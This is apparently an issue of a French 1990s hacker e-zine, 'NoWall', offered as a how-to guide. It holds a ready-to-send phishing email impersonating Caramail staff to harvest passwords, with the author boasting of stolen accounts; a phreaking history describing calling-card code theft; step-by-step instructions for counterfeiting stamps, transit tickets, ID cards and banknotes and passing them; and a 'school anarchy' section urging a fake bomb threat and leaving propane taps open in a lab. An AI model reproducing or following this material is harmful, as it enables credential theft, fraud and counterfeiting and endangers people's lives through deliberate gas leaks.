	********************************************



	Bon, be pour ça, y'a plusieurs techniques...


	*** TECHNIQUE UN ***

	Vous prenez pas la tête : envoyez le source pour les comptes Hotmail à des gens sur 
Cacamail, y'aura toujours des idiots pour marcher dans la combine.


	*** TECHNIQUE DEUX ***

	Créez-vous une boîte sous Caramail en prenant le pseudo "Administrateur Caramail" et en
choisissant une adresse e-mail du genre "admin-cara@caramail.com" (surtout : pas de numéro !),
et envoyez l'e-mail suivant à des dizaines des personnes (mais envoyez les mails un par un,
pas tous en même temps, parce que ça ferait zarbi qu'un admin n'ait pas de service de mailing-
list pour son propre serveur) en mettant en titre "Problèmes de maintenance" :


"Cher(e) abonné(e),

Suite à différents problèmes de maintenance causés par un groupe de pirates informatiques, 
plusieurs informations de notre base de données ont été effacées ; il s'agit de celles se 
trouvant avant la "Question/Réponse" sur les formulaires d'inscription.

C'est pourquoi nous devons vous demander de remplir le questionnaire suivant et de nous le 
retourner en cliquant sur "Répondre" en haut à gauche de votre écran, puis sur "Envoyer", sans 
modifier le sujet du message.


Nom :
Prénom :
Surnom :

Login :
Mot de passe :

Code Postal :
Ville :
Pays :

Date de naissance :


Merci de nous répondre dans les plus brefs délais.

Cordialement,
L'équipe Caramail."


	Moi, j'ai envoyé ça à pas mal de personnes un soir où je me faisais chier dans mon club
d'informatique, et j'ai obtenu les pass de presque toutes mes cibles (presque, parce que les 
hackers ne marchent pas dans ce genre de trucs)...
	Il se pourrait peut-être que j'en diffuse quelques uns (voire tous) dans un prochain 
numéro de NoWall, si l'envie m'en prend ou qu'on me le demande... Héhéhé... ;-)

	
	*** TECHNIQUE TROIS ***

	C'est un truc qui reprend la technique du hack de Hotmail, sauf que c'est pour Caramail,
mais je sais plus où j'ai mis ça sur ma bécane, donc ce sera pour le prochain numéro...
	Patience, jeune Padawan... :o)
 




                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |         C U L T U R E         |
                            |                               |
                            ---------------------------------



	*******************************
	*** HISTORIQUE DU PHREAKING ***
	*******************************

	
	[ Tiré du PC Team n°11 ]

	Une pratique très courante outre-Atlantique (moins en France) est le Phreaking. Le but 
recherché dans ce cas n'est pas de percer les défenses d'un système informatique mais de 
contourner le réseau téléphonique pour ne pas payer la communication. Dans les méthodes exigeant
des compétences, il s'agira en général de trouver un moyen d'accès à une ligne de maintenance 
via un numéro vert (donc gratuit). La commutation des lignes utilise des fréquences vocales que
l'on peut reproduire avec un ordinateur et une carte sonore. La légende veut que dans les années
60, aux États-Unis, le premier Phreaker ait utilisé un sifflet distribué dans une boite de 
céréales Captain crunch. Une autre légende parle d'un aveugle sifflant à la même fréquence que 
ce sifflet, soit 2600 mhz.
	
	Le premier véritable outil des Phreakers fut la box, une petite boîte remplie de 
composants électroniques qui permettait de reproduire exactement cette fréquence. Pour les
petits malins sans scrupules, il sera beaucoup plus facile de trouver une Calling-card 
(équivalent de la Carte Pastel de France Télécom) pour téléphoner aux frais d'une autre 
personne. Cette forme de délinquance informatique est véritablement l'ancêtre du piratage et 
reste encore aujourd'hui une composante forte de la communauté des Hackers. Les notions de 
Hacking et de Phreaking sont d'ailleurs intimement liées. Les magazines spécialisés dans le 
piratage qui existent aux États-Unis sont très explicites sur cette relation entre Phreaker et 
Hacker.
	
	En France, le plus discret, No Way, a fait le point, avant sa disparition, sur toutes 
les pratiques du Phreaking et n'a pas hésité à divulguer certains moyens d'accès téléphonique. 
A titre d'exemple, les méthodes de Phreaking sont utilisées pour brouiller les pistes qui 
permettraient de remonter jusqu'au hacker qui s'attaque à un système distant, comme il sait se 
déplacer librement de lignes en lignes, il peut composer un chemin complexe, pour ainsi éviter 
tout repérage. Il existe une bonne centaine de méthode pour pirater les lignes téléphoniques. 
En voici une petite liste : Aqua Box, Beige Box, Blotto Box, Blue Box, Brown Box, Chess Box, 
Green Box, Megenta Box, Pearl Box, Purple Box, Red Box, Urine Box ou encore Yellow Box. On vous 
fera grâce du reste.


Et Internet dans tout ça ?

	Gavant l'Internet, beaucoup de réseaux "propriétaires" existaient déjà et un simple 
modem suffisait pour devenir hacker. En ce sens, rien n'a vraiment changé, excepté le fait que 
désormais, les pirates disposent de ce nouvel outil qui relie une multitude de réseaux entre 
eux. La plupart des systèmes même sensibles ont une porte d'entrée sur l'Internet et les Hackers
de tous bords découvrent ainsi de nouvelles opportunités. Il faut pourtant savoir que ces portes
sont extrêmement protégées, en ce qui concerne par exemple les réseaux militaires. Mais cette 
surveillance coûte cher et de nombreux systèmes, comme les systèmes universitaires ne peuvent se
l'offrir.

	Internet est aussi un formidable moyen de communication et donc une importante source 
d'échanges entre les pirates de toutes nations, et dont les objectifs sont très variés, il 
remplace d'ailleurs de plus en plus les BBS spécialisés, tout simplement parce que sur 
l'Internet, on ne paie souvent qu'une communication locale et que l'audience est internationale.
Les lieux les plus fréquentés par les pirates sont l'IRC, lieu de discussion en temps réel, 
ainsi que les newsgroups, des messageries à thèmes. Certains newsgroups ont des noms explicites,
comme par exemple, alt.2600 ou alt.crack. Les plus rusés utilisent d'autres thèmes beaucoup 
moins parlants. Les Hackers n'hésitent pas non plus à créer et fréquenter certains sites WEB ou
Gophers, systèmes hypertextes. Enfin, les utilitaires et autres fichiers d'informations sont 
facilement téléchargeables sur des serveurs FTP (transferts de fichiers). Il faut savoir que les
lois n'interdisent pas explicitement la diffusion d'informations ou de logiciels destinés aux 
actes illicites (cela irait contre les principes de la liberté d'expression et ce serait de plus
pratiquement impossible à mettre en place). Par contre, c'est l'utilisation de ces informations 
qui est interdite dans tel ou tel pays, par exemple, le cryptage des données.


Time is money

	Pour accéder à toutes ces informations, les pirates ont donc du pallier les transactions
obligatoires liées aux communications téléphoniques. Le moyen le plus utilisé reste les Calling-
cards. Ce système, similaire aux Cartes Pastel de France Télécom, provient des Etats-Unis. Il
permet à l'utilisateur de payer ses communications chaque mois, qu'il soit dans une cabine 
téléphonique, sur un portable ou chez des amis. Pour cela il possède un code secret. Les Hackers
s'approprient ces listes de numéros clients. Pour cela les "puristes " les dérobent directement 
sur les bases de données des Télécom. Les autres, les "lamers" les achètent ou s'arrangent pour 
attendre derrière des cabines publiques pour récupérer les codes confidentiels taper par les 
possesseurs de ces codes. La gare du nord, à Paris, fût, il y a encore peu de temps un terrain 
de chasse très fructueux, Nous avons pu à titre d'essai, repérer pas moins de 4 numéros en moins
de 30 minutes. Retenir les 14 chiffres du code reste assez facile pour n'importe quel quidam. 
Une fois interceptés, les numéros sont revendus, à des prix dépassant très souvent les 500 
francs. Les nouveaux détenteurs des numéros peuvent ensuite téléphoner sur le compte des vrais 
possesseurs de la Calling-card. Aucune agence de télécommunication au monde n'est à l'abri de ce
genre de piratage, une dizaine de Phreak-Masters ont en tout cas pu nous le confirmer. Mais 
repérer des appels et de plus en plus efficace pour les Télécoms. L'apparition du service de 
France Télécom de 1997 permettant de connaître le numéro de téléphone de l'appelant et cela par 
simple affichage sur l'écran du téléphone de l'appelé est l'une des applications simples de ce 
traçage.
	
	Les Hackers sont conscients des difficultés et surtout des protections qui veillent sur 
les lignes téléphoniques. Un hacker prénommé PhE! nous l'a confirmé : "tous les 36 15, 35 28, 
sont surveillés, France Télécom possède le numéro de téléphone de l'appelant, le nombre d'heures
de connexion, le nom du service appelé, et s'il y a trop d'appels sur les mêmes services, France
Télécom surveille si le règlement du service a bien était effectué." Les contrôles sur les 
appels à l'étranger sont tout aussi important. Selon PhE!, "les 0800.90 sont quasiment tous 
contrôlés." France Télécom peut, semble-t-il, détecter les anomalies de temporisation de 
certaines Black-Boxes : "si l'utilisateur de ces petits boîtes reste connecté plus de 4 minutes
à un numéro qui ne répond pas, ou sur une liaison qui n'est pas établie, c'est inscrit sur le 
TTY du central avec le numéro et la date de l'appel". La dernière affaire en date en France liée
au Phreaking c'est déroulée en 1997. La Brigade Centrale de Répression du Crime Informatique 
avait stoppé à cette époque les agissements d'une dizaine de personnes fournissant par Internet 
des images pornographiques. Rien de bien particulier, car il existe des milliers de sites sur le
net offrant ce genre de produit. Les pirates ont utilisé une Blue-Box, des numéros gratuits à 
l'étranger. Originaires de Puteaux, de Besançon et d'une dizaine d'autres villes de France les 
pirates passaient par le Paraguay pour ne pas payer leurs communications. Le préjudice est 
estimé à un peu plus de 6 millions de francs. France Télécom disposerait d'un système de 
surveillance appelé "SIRIUS". Il permet de contrôler toutes les communications en cours ainsi 
que le bon de paiement du service utilisé. Une enquête est lancée si une anomalie apparaît. Le 
numéro composé est un 0800, un 13 ou autres numéros gratuits, l'alerte est effacée... Si 
l'enquête révèle qu'aucun paiement n'a été effectué, l'information est tout de suite transmise 
au service concerné. France Télécom surveille aussi de très près les cabines téléphoniques, tout
fil coupé est détecté. Cependant, malgré toute l'efficacité des systèmes de sécurité, 
l'utilisation des numéros de cartes AT&T ou Pastel de France Télécom reste encore très répandu 
en France comme à l'étranger. Détourner les lignes téléphoniques reste donc le jeu favori des 
pirates. En 1997, lors du HIP, le congrès international des Hackers aux Pays-Bas, les PTT 
néerlandaises avaient constaté que leur système informatique gérant le central téléphonique 
avait été percé, permettant ainsi au possesseur du code de téléphoner gratis aux quatre coins 
de la planète. Coté Box, il en existeraient une cinquantaine de modèles donc le coût de 
fabrication ne dépasserait pas les 50 francs. Mais pas la peine de chercher où et comment ça 
marche, très peu de ces boîtes fonctionnent en France. Par contre depuis l'apparition de cartes
prépayées style carte Kertel, Mobicartes, etc, les Phreakers ont trouvé un nouveau moyen de 
téléphoner à l'oeil. 





	*************************
	*** DEVENIR FAUSSAIRE ***
	*************************


	Alors, pour les réalisations d'arts qui vont suivre, voici ce dont vous aurez besoin :

* Un scanner de la meilleure qualité possible
* Un logiciel de création et de modification d'images
* Une imprimante couleur (laser, si possible)
* Un plastificateur entre 3 et 5 mm (plus ou moins facultatif)

	
	Commençons par le plus drôle : la création de faux timbres.

	Pour cela, laissez marcher votre imagination : dessinez ce qui vous chante au format qui
vous chante (mais pas trop grand quand même pour pas trop attirer l'attention), sans oublier les
trucs classiques (prix et logo "République Française", si vous êtes en France) et imprimez-le. 
Ensuite, découpez votre timbre dans la forme qui vous voulez (carré, rectangle, losange, rond, 
étoile, coeur, etc). Vous pouvez vous amusez à découper des dendelures si ça vous fait triper, 
mais ce n'est pas nécessaire. Et c'est fini !

	Rassurez-vous, ça marchera : la poste n'a pas de machine pour reconnaître les timbres, à
cause de tous les formats et de toutes les formes qui existe ; ce sont les employés qui sont 
chargés de reconnaître les timbres, mais il y a tellement de lettres à contrôler qu'ils ne 
peuvent pas se pencher sur chaque timbre, sans oublier que de nouveaux timbres sortent chaque 
semaine et qu'ils ne peuvent pas tous les connaître...

	Mais soyons paranos : ne laissez jamais votre nom ni votre adresse à l'intérieur ou sur
l'enveloppe, des fois que.

	Enfin, la petite touche "fuck capitalism and make money" : vendez vos créations 50 
centimes ou 1 francs moins cher que la poste (ça, c'est pour la France, je ne connais pas les 
prix dans les autres pays). 


	Maintenant, passons aux tickets de bus, tram ou métro :

	Scannez un ticket de bus, tram ou métro et imprimez-le en de multiples exemplaires sur 
du papier bristol, et vous avez vos tickets contrefaits. Si vos tickets sont des tickets 
mensuels, retouchez-les avec votre logiciel et changez le mois.

	Comme on est tous des enculés de trous du cul (héhéhéhéhé), vendez vos faux tickets un à
deux francs moins chers que les entreprises de transport en commun de votre ville.


	Enfin, pour être un vrai faussaire, vous devez savoir faire des fausses cartes :

	L'inconvénient de cette technique, c'est qu'on ne peut ni reproduire les reliefs ni 
reproduire les hologrammes (mais si celui qui contrôle votre carte est un peu neu-neu, ça peut 
passer).

	Donc, pour en revenir à nos roustons, gulps !, nos moutons, avoir une fausse carte est 
très pratique si on veut boire de l'alcool "légalement" en boîte quand on est mineur, acheter 
une arme, emprunter un truc sans avoir l'intention de le rendre, commander un truc sous un faux 
nom, ou alors si on se fait pécho en train de chourer dans un magasin :o) etc...

	Pour en venir à la technique : scannez un exemplaire de la carte que vous voulez 
contrefaire (avec la meilleure qualité possible), modifiez ce qui vous dérange (nom, âge, photo,
etc) en respectant la police originelle (grâce à des copier/coller sur un logiciel de traitement
de texte quelconque pour voir laquelle c'est) et imprimez-la avec la meilleure qualité possible 
sur du papier bristol ou plastique (ça dépend de la carte que vous contrefaites). Ensuite, 
découpez-la au bon format et plastifiez-la si besoin est (en respectant l'épaisseur de plastique
de la carte d'origine).

	Toujours parce que vous êtes un vieille salope qui nique la société, vendez vos cartes 
(autour de 200-300 balles ou plus suivant la carte et la qualité). Et n'oubliez pas que plus 
vos cartes sont de bonnes qualités plus les clients sont prêts à payer cher. Par contre, 
méfiez-vous si un type vous accoste en vous demandant telle carte et dites que vous ne savez pas 
de quoi il parle, et, tant qu'à faire, essayer d'avoir toujours au moins un intermédiaire dans 
vos transactions.


	Enfin, la partie la plus rentable : la contrefaçon de billets ;o)

	Alors, comme pour le reste, scannez des billets avec la meilleure qualité possible, mais
ne prenez pas les plus gros, parce que bon, on sait jamais, et puis en général, les gens font un
peu plus gaffe au bifton quand il a une grosse valeur, donc ne dépassez pas les billets de 100
balles (pour les français), mais il me semble que les billets de 50 balles sont les plus
adaptés, car courant, pas d'une trop forte valeur et un peu passe-partout. 

	Ensuite, retouchez les images de façon à ce qu'elles ressemblent le plus à des biftons,
en mettant par exemple du gris fluo à la place des bandes d'aluminium ou des trucs dans ce 
genre ; mais bon, gardez à l'esprit que vos contrefaçons ne seront pas d'une grande qualité,
mais ça passera toujours prêt d'une personne non-avertie.

	Maintenant, imprimez-en un bon paquet et faîtes très gaffe en les découpant et en
collant les deux faces dos à dos.

	La dernière phase consiste à écouler son stock sans se faire niquer ; pour ça, il y a
plusieurs moyens :
		
		- Trouvez des petites épiceries ou des petits bureaux de tabac où les gérants
sont comme qui dirait des débiles légers, et rentrez pénard, achetez un truc pas cher (un paquet
de clopes, par exemple, mais fumer, c'est pô bien :oP ou une barre de chocolat du style les
barres Mars aux noisettes, c'est trop bon !) et vous ressortez avec votre truc et votre monnaie,
qui elle, ne sera pas contrefaite.
		
		- Allez dans des bars ou des cafés et demandez à échanger un de vos biftons 
contre de la petite monnaie.

		- Proposez à vos potes (enfin, vos connaissances, pas vos potes, c'est bâtard) 
d'échanger vos biftons contre des pièces.

		- Empruntez du fric et rendez-le sous forme de faux-billets.

		- Réfléchissez, vous trouverez d'autres moyens...


	En tout cas, les deux règles d'or sont que personne à part vous ne doit savoir que les 
billets sont faux et qu'il ne faut pas toujours pigeonner la même personne, sinon vous allez 
vous faire pécho, et ça, ça le ferait pas.

	Enfin, un dernier tuyau : froissez vos billets, parce que les billets qui ont une 
vieille apparence n'attirent pas l'attention et ils passent comme une lettre à la poste (surtout
quand cette lettre a un faux timbre... Narf !).


	Bon, ben ce tutorial s'arrête là ! Bonne carrière les p'tits faussaires !!!





	***************************
	*** L'ANARCHIE SCOLAIRE ***
	***************************



	Bon, ben j'ai un peu rippé ça au NPC#10, alors je les remercie et j'espère qu'ils me 
pardonneront ce pillage...


	*** INTRODUCTION ***

	Tout d'abord, commençons par admettre que si l'école était si nulle que ça, y'a 
longtemps qu'elle n'existerait plus. Retenez-le, ça vous évitera pas mal de conneries...

	Pourquoi ce tutorial alors ?

	Ben pour plusieurs raisons :

	1°) Eveiller la conscience d'autres personnes, qui deviendront à leur tour de futurs 
Anarchistes Scolaires, et qui pourront éventuellement :
		- Vous aider dans votre tâche.
		- Continuer votre mission après votre départ, s'ils sont plus jeunes que vous.

	2°) Modifier les nombreuses failles de notre présent système d'éducation en utilisant 
les moyens nécessaires pour que ça bouge (même la manière forte, s'il le faut).

	3°) S'éclater, car la période scolaire est pour bon nombre d'entre nous une période 
plate de la vie, et être au sein d'un mouvement de rebellion vous montrera qu'il y a autre chose
qu'une belle fille ou un beau mec dans votre classe pour vous faire apprécier un tant soit peu 
l'école.


	*** O-P-A-L ***


	Prenons un exemple : Jean-Kevin (dédicace à ZipiZ) écoute du Mettalica et est une vraie 
racaille de la mort qui tue. Durant la récréation, il s'infiltre dans le local d'informatique et
vide une bouteille d'acide sulfurique dans le boitier d'un PC. Il repart avec le sentiment du 
devoir accompli, et va s'en vanter à toute sa bande de potes rebelles...

	Résultat : Rien, si ce n'est une facture de plus que ses parents payeront en gueulant.

	Casser pour casser, ce n'est pas de l'anarchie. Porter un bombers, un treillis et des 
ranjos, ce n'est pas de l'anarchie. Ecouter du Death Metal Trash à fond, ce n'est pas de 
l'anarchie. C'est de l'anti-conformisme, c'est tout... Et ça fait pitié !

	Pour faire quelque chose qui soit utile dans votre bahut, il faut de l'organisation. Il
faut créer une sorte de petite pègre, pas pour avoir le monopole de l'anarchie (ce ne serait 
alors plus de l'anarchie), mais pour contribuer à son développement.

	Je pense que le système OPAL (Organisation-Propagande-Action-Liaison) est un bon schéma.

	** Organisation **

	Tout d'abord, il vous faut du monde prêt à vous aider dans votre projet (cyberpunks, 
grungers, syndicalistes lycéens ; bref, n'importe qui étant à même de comprendre que le monde 
ne tourne pas rond et voulant le changer), votre tâche n'en sera que facilitée. L'important, 
dans le monde que vous choisirez, c'est de sélectionner des personnes RESPONSABLES. Il vous faut
des comparses pouvant faire ce que vous voulez quand vous le voulez.

	Bien sûr, si vous donnez des ordres que vous ne vous bougez pas le cul vous même, il y a
de fortes chances pour que vos amis vous larguent et que votre "entreprise" courre à la 
faillite, alors ne vous contentez pas de parler, agissez.

	** Propagande **

	La majorité du travail et des frustrations s'effectue ici, mais une bonne partie du 
plaisir aussi.

	Premièrement, vous devez être discret, très discret ; personne ne doit savoir que c'est 
vous qui êtes à la base de l'organisation anarchiste de votre bahut, pas même votre meilleur 
pote ou votre petite amie (sauf s'ils sont dans l'organisation eux-aussi), et cela pour deux 
raisons simples :
		- Les filles ont généralement des grandes gueules.
		- Les garçons ont généralement des grandes gueules aussi.

	Ensuite, il y a deux grandes manières de faire la propagande anarchiste et il est 
important de savoir laquelle vous allez utiliser avant de le faire.

	1°) Le groupe & l'anarchie : donnez un nom à votre petite faction rebelle, et faîtes 
tout sous ce nom. Essayez d'avoir des moyens d'inscription (VMB, par exemple) et recrutez des 
membres.

	2°) L'anarchie sans groupe: vous ne faîtes vos actions sous aucun nom revendicatif ; si
vous placardez des affiches, par exemple, vous écrirez dessus "Vive l'Anarchie" à la place de 
"Joignez les rangs de <Nom du Groupe> et soutenez l'Anarchie".

	Maintenant, voici le plus important: les différents moyens de propagande, ou comment 
faire pour faire parvenir l'information là où elle doit parvenir :

	a) Affiches, tags et graffitis: les posters seront en mesure de faire passer le message 
de manière claire, mais pour un court laps de temps, par contre (le temps qu'un minable arrache 
l'affiche). Les tags et garffitis restent plus longtemps (car c'est plus chiant de laver un mur 
ou une table que d'arracher une affiche), mais vous avez intérêt à ce qu'ils soient beau si vous
voulez pas passer pour un bouffon.

b) Magazine: le magazine est une EXCELLENTE facon de faire circuler l'information, et vous 
pouvez en dire beaucoup plus dans un magazine que sur un poster ou un tag et le message 
circulera plus longtemps car les gens conserveront et se prêteront les magazines. Par contre,
écrivez pour le public le plus large possible, parce que ci vou aikrivé kom sa ou si vous 
rédigez votre pamphlet de revendication de la sorte, vous ne toucherez que les nazes ou les 
intellos et vous allez gaver tous les autres. Et surtout, n'oubliez pas qu'il vous faut un 
titre : n'en changez jamais, et prenez un titre accrocheur (moi, j'avais choisi "FUCK YOU !", et 
j'avais fait sensation :-P). Bon, c'est sûr qu'un mag, il faut le préparer, le photocopier et le 
publier, mais réfléchissez bien et vous verrez que vous pourrez vous démerder pour le 
photocopier gratis et si vous écrivez à plusieurs, ce sera plus rapide, quant à la distribution,
voici quelques idées :

		- Laissez une pile sur le dessus d'un chiotte. Tous ceux qui iront chier ou 
pisser après vous les verront et prendront sûrement un exemplaire.

		- Laissez une pile à chaque bloc de casiers, par terre (c'est un peu naze, mais 
ça peut toujours marcher).

		- Si les casiers le permettent, glissez des exemplaires directement dans des 
casiers. Vous pourriez même commencer un service de distribution à chacun des abonnés, pour une 
somme modique (ou gratuit, ça le fera plus et vous passerez pour un Robin des Bois).

		- Cette méthode, vous devriez l'essayer au moins une fois dans votre vie, bien 
qu'elle soit un peu plus risquée. Il vous faut,un set de linge complet de rechange (même les 
pompes) et une cagoule, de la réputation (il faut que pas mal de monde connaisse votre journal, 
sinon, ça va foirer), une énorme pile de votre magazine (au moins 100 copies). Bon, tout se 
passe sur l'heure du déjeuner, pendant que les autres étudiants bouffent à la caféteria. Allez 
aux chiottes, changez de vêtements, mettez la cagoule, prenez la votre pile d'exemplaires sous 
le bras et sortez des chiottes, faites un petit jogging jusqu'à la caféteria, sautez sur une 
table au milieu de la caféteria (faîtes gaffe à pas vous casser la gueule, vous auriez l'air 
con, très con) et gueulez un truc du genre "Vive la pensée libre! Vive !". Foutez la pile de 
magazines sur la table et cassez-vous vite, allez à un endroit où vous pouvez vous changer, et 
revenez à l'école, mine de rien (un peu dans le genre Superman). 
	ATTENTION : si vous faites ce truc avant que le magazine/groupe ne soit connu, personne
(ou presque) n'osera ramasser ce journal. Par compte, si vous avez une réputation de qualité et 
que pas mal de monde vous aime, ça va se jeter sur les magazines et ils vont partir comme des 
petits pains.

	c) Televox : certain bahut sont équipés d'un truc pour que le proviseur ou quelqu'un de 
l'administration puisse faire passer son message aux élèves ; un crack de l'électronique 
réussira facilement à s'infilter dans le réseau de Televox, soit directement sur un fil, soit 
en utilisant illégalement un des téléphones du secrétariat (la plupart du temps, la personne 
parle dans un téléphone). Déguisez votre voix et passez votre message, puis balancez une bonne 
grosse musique qui tâche genre Rop Zombie, Ministry ou RATM jusqu'à que vous soyez repéré.

	d) Projections : enregistrez avec une mini-caméra un petit film de propagande, et 
substituez la cassette à celle que votre prof de biolo va passer. Réactions garanties ! Même si 
vous n'atteignez que 30 personnes, l'école entière va en entendre parler, n'oubliez pas ça! 

	e) Faites un dessin sur l'écran de projection d'aétates (celui qui s'enroule) de vos 
classes. Un classique du genre : une fille nue qui dit dans une bulle: "J'aime ". 

	f) Livres : Allez au CDI de votre bahut avec une pile de petites fiches sur lesquelles 
sont inscrits des slogans de votre groupe (ou ce que vous avez à dire). Insérez une fiche dans 
les romans "Best-Sellers" de votre école (Agatha Christie, Collections Frissons, Stephen King, 
Barjavel, etc... MAis pas de "Fais-moi peur !" ou "Léo & Popi" !!!). Succès garanti ! 

	g) Radio-étudiante : un autre must. Démerdez-vous pour avoir un contact dans le staff de
la radio ou bien donnez-leur une cassette en prétextant que c'est tel groupe à faire passer en 
demande spéciale (tout en sachant très bien que c'est un symposium des idées de votre mouvement).

	h) Autres : Ah ! Mon Dieu ! Tant de choses restent à imaginer !!!

	
	** Action **

	Vous aurez beau faire de la propagande, si votre groupe ne s'affirme pas en faisant 
quelque chose de concret, vous allez passez pour des grandes gueules qu'ont rien dans le froc et
vous disparaîtrez dans la brume. La propagande peut causer par elle-même quelques actions 
(poursuites, qui sait ?), mais il faut en organiser de votre bord si vous voulez que les choses 
bougent :

	a) Ouvrez un service d'information pour laisser les étudiants donner leur opinion sur 
tel professeur ou administrateur, et remettez les résulats au proviseur (ou au CPE si vous en 
avez après le proviseur). Résultats garantis ! 

	b) Organisez une révolution générale contre les lois de port de vêtements (et oui, ça 
existe encore des trucs pareils !). Tout le monde doit avoir au moins une dérogation au code. 
Délire en perspective !!!

	c) Votre bouffe de caféteria goûte la merde et vous donne la gerbe ? Démerdez-vous pour 
que TOUT LE MONDE apporte son lunch pendant une semaine (ou moins, si c'est impossible pour une 
semaine), et revendiquez, au nom des étudiants, de la meilleure bouffe. Si ça ne marche pas, 
organisez avec tout le monde une bonne grosse vieille bataille de bouffe !!!

	d) Une fausse alerte à la bombe, quoi de mieux pour se payer un petit congé d'un 
après-midi ? Suffit d'avoir une unité sur une carte téléphonique et de l'assurance au téléphone,
pensez-y !

	e) Durant l'heure du déjeuner, laissez ouvertes les sorties de gaz propane dans la salle
de TP de sciences phy. Une fuite de gaz devrait suffire à fermer l'école pour un aprem'.

	f) Demandez à votre bibliothèque de s'abonner à un bon magazine underground (2600, Mondo
 2000, TAP) et insistez sur le fait qu'il devrait être disponible aux étudiants.

	g) Gardez vos cahiers d'exercices, recherches et corrigés de contrôles et balancez tout
ça à ceux qui prennent votre place à la rentrée.

	h) Ah ! Laissons l'imagination faire son oeuvre... ;-P

	Et n'oubliez pas : vos actions déclencheront une propagande extérieure et idéalement, 
elle arrivera à un point tel où chaque fois qu'il se passe quelque chose à l'école, on mettra 
ça sur le dos de votre organisation, et c'est très plaisant, croyez-moi.


	** Liaison **

	C'est pas compliqué: TOUT DOIT SE LIER. La propagande doit être liée à votre groupe ou 
à votre magazine, et votre magazine doit être lié à votre groupe.

	Le groupe doit continuer à exister après votre départ, alors désignez des sucesseurs, 
et ne crachez pas sur les plus jeunes.

	Et pour avoir plus d'impact, essayez de créer un mouvement voisin dans d'autres bahuts 
de votre ville.


	*** CONCLUSION ***


	En conclusion, finissez de lire ce premier numéro de NoWall et... Bougez-vous le cul !!!

	Et n'oubliez pas : l'Anarchie peut être constructive et c'est son but !







                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |           O U T R O           |
                            |                               |
                            ---------------------------------



	Ben voila, on arrive à la fin de ce premier numéro de NoWall, j'espère qu'il vous
a plu et qu'aucun d'entre vous ne m'écrira pour me dire que je suis un gros naze (enfin, vous
pouvez toujours, mais bon, c'est un peu con quand même !).

	Comme le font les vrais H4x0rZ, voici mes greetz :

		- la mAdteAm, surtout Wolf et CYBz, avec qui je me suis tapé de bons délires
		- ACiD BuRN et Clad Strife, du HKWD Clan, qui m'ont aidé à débuter
		- les membres du CDW, parce qu'ils sont vraiment trop drôles
		- RV, un pote à moi qui se reconnaîtra
		- Thomas, une Elite qui n'a pas eu de chance (Héhéhé...)

	
	Sinon, je cherche des gars, des filles, des chiens, des chats, des hermaphrodites,
des homosexuels, des hétéros, des bi-sexuels, des nécrophiles, des cons, des newbies, des
lamers, des Elites, des connards, des débiles, des emmerdeurs, bref : je cherche du monde
pour m'aider à écrire des articles pour NoWall ; parce que tout seul, je crois pas que j'irais
bien loin.

	En fait, je cherche surtout du monde qui s'y connait en :

		- Hack sous Linux/UNIX
		- Intrusions de réseaux
		- Phreaking de téléphones portables (c'est mieux si ça marche en France)
		- Cracking (parce que chez moi, le crack, ben c'est la misère totale)
		- Conneries, délires, passer le temps (in)intelligemment, etc...
		- Drague de filles (parce qu'en ce moment, c'est la misère...)
		- Tout ce qui peut se mettre dans un e-zine :o)
		

	Bon, ben j'crois qu'c'est le moment de se quitter,... SNIF... Je suis triste... Je vous
aime tous... Gros bisous... Gros poutoux-poutoux... RENDEZ-VOUS AU NUMERO DE NO WALL !!!

	

	
	  	 ___________________________________________________
	 	|						                |
		|	 	      RavenShadow			          |
		|						                |
		|  	      RavenShadow@ifrance.com		          |
		|						                |
		|						                |
		|"La diffusion du savoir est notre dernier espoir." |
		|                                                   |
		|___________________________________________________|









		      